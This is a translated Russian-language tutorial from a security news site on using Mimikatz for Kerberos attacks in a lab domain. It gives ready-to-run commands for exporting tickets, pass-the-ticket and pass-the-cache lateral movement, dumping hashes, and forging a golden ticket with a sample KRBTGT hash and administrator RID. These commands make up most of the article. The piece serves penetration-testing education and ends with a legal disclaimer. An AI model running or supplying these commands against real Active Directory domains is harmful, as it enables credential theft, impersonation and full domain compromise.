СвежееНовостиМероприятияСтатьиОбзорыОтчетыИнтервьюВидеоБлогиУтечкиУязвимостиДайджестыОбучениеВакансии
Темы
ИБ ИИ Облака Инфра Dev
О проекте StartUp Hub Контакты Компании Реклама Политика ПДн
Статьи
Игорь Б
12.07.2022
#ИБ#Инфра

MimiKatz для тестирования на проникновение | Kerberos

MimiKatz для тестирования на проникновение Kerberos

Изображение: Blake Connally (Unsplash)

В этой статье пойдет речь о пентестинге с помощью Mimikatz. Данная программа используется для извлечения из памяти билетов Kerberos и создания золотых билетов.

Введение

В данном практическом примере пользователь будет использовать Mimikatz в машине клиента, чтобы получить билеты, доступные для извлечения в этой среде.

Kerberos::list

Пользователь вводит следующую команду:

kerberos::list

Эта команда выведет на экран все билеты, доступные на компьютере клиента.

Как можно увидеть на скриншоте выше, в компьютере клиента доступны 2 билета. Команда —list предоставит пользователю такую информацию, как:

  1. Время начала/окончания действия билета.
  2. Имя сервера.
  3. Имя клиента.
  4. Флаг.

Kerberos::list /export

Пользователь получил нужную ему информацию. Если он хочет сохранить ее для дальнейшего использования или отправки, то следует ввести данную команду:

kerberos::list /export

Таким образом, пользователь сохранит вышеуказанные билеты TGT в папке Mimikatz в формате .kirby.

Теперь, когда билет был сохранен в папке Mimikatz, пользователь переименовал его в «ticket.kirby» для своего удобства. Стоит отметить, что переименовывать файл необязательно.

Поскольку у пользователя есть этот билет, теперь он рассмотрит, как можно использовать его для бокового перемещения в дальнейшем, чтобы выполнить атаку «Pass the ticket».

Чтобы осуществить атаку «Pass the ticket», стоит взглянуть на следующую команду.

Kerberos::ppt ticket.kirbi

Как только данная команда будет успешно выполнена, пользователь введет другую команду («misc::cmd»), она запустит сеанс командной строки. Можно заметить, что сеанс командной строки был открыт с пользователем домена ignite\aarti.

Стоит попробовать просмотреть каталог сервера с помощью пользователя aarti. Для этого вводится следующая команда в командной строке:

dir \\192.168.1.188\c$
  • 192.168.1.188 – это IP-адрес сервера.

Как можно заметить, пользователь имеет возможность просматривать все каталоги сервера.

Таким образом, получив доступ к учетной записи домена, не являющейся администратором, пользователь aarti смог просмотреть каталог диска C. Для этого он использовал атаку «Pass the ticket».

Kerberos TGT

Чтобы вывести на экран все TGT (Ticket Granting Ticket), пользователь может использовать следующую команду:

kerberos::tgt

Kerberos ASK

Данная команда поможет пользователю получить доступ к служебному билету (англ. «service ticket»). Синтаксис для ее корректного выполнения:

  • Kerberos::ask /target/spn name, где «spn name» – это «cifs:/dc1.ignite.local»
kerberos::ask /target:cifs/dc1.ignite.local

Чтобы отобразить все служебные билеты, пользователь вводит следующую команду:

kerberos::list

Как можно заметить на картинке ниже, есть 3 билета.

Kerberos Hash

Пользователь вводит следующую команду:

kerberos::hash

Ее ввод приведет к дампу всех хешей, доступных на компьютере клиента.

Kerberos::golden

Настала пора поговорить об атаке под названием «Golden Ticket Attack (GTA)».

Золотые билеты (англ. «golden tickets») – это поддельные Ticket Granting Tickets (TGT), еще называемые билетами для аутентификации. Ниже представлена информация, которая поможет пользователю корректно осуществить атаку.

  • Доменное имя: ignite.local.
  • SID: S-1-5-21-1255168540-3690278322-1592948969.
  • Хеш KRBTGT: 5cced0cb593612f08cf4a0b4f0bcb017.
  • Пользователь, выдающий себя за другого: raaz.

Итак, если у пользователя есть доменное имя, SID и хеш krbtgt, то он может переходить к атаке «Pass the ticket», создав поддельную атаку «Golden ticket».

Итак, команда для выполнения GTA (Golden Ticket Attack) выглядит следующим образом:

kerberos::golden /user:raaz /domain:ignite.local /sid S-1-5-21-1255168540-3690278322-1592948969 /krbtgt: 5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt
  • id:500 указывает на привилегии администратора.

Как видно выше, команда была успешно выполнена. Теперь нужно запустить командную строку с помощью Mimikatz. Для этого выполняется команда:

misc::cmd

Через новую командную строку пользователь сможет получить доступ к каталогам сервера.

Атака «Golden Ticket» также может быть выполнена с помощью инструмента Impacket.

Используя Mimikatz или Rubeus, пользователь может создать билет в файле формата .kirby. Однако если он использует Impacket для проведения атаки «Golden Ticket», чтобы получить билет, он извлечет его в формате .ccache.

Kerberos::ptc

Итак, если у пользователя есть билет в формате .ccache, то он может отправить его себе с помощью команды:

kerberos::ptc Administrator.ccache

Команда misc::cmd откроет новую командную строку, с помощью которой пользователь сможет получить доступ к каталогам сервера.

Kerberos::clist

Если пользователь хочет перечислить все файлы .ccache, существующие в системе клиента, он будет использовать следующую команду:

kerberos::clist Administrator.cache

Kerberos::purge

Если пользователь хочет удалить все билеты в формате .ccache или .kirby, он будет использовать следующую команду:

kerberos::purge

Автор переведенной статьи: Tirut Hawoldar.

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Игорь Б
Автор: Игорь Б
Представитель редакции CISOCLUB. Добавляю статьи на сайт.
Комментарии: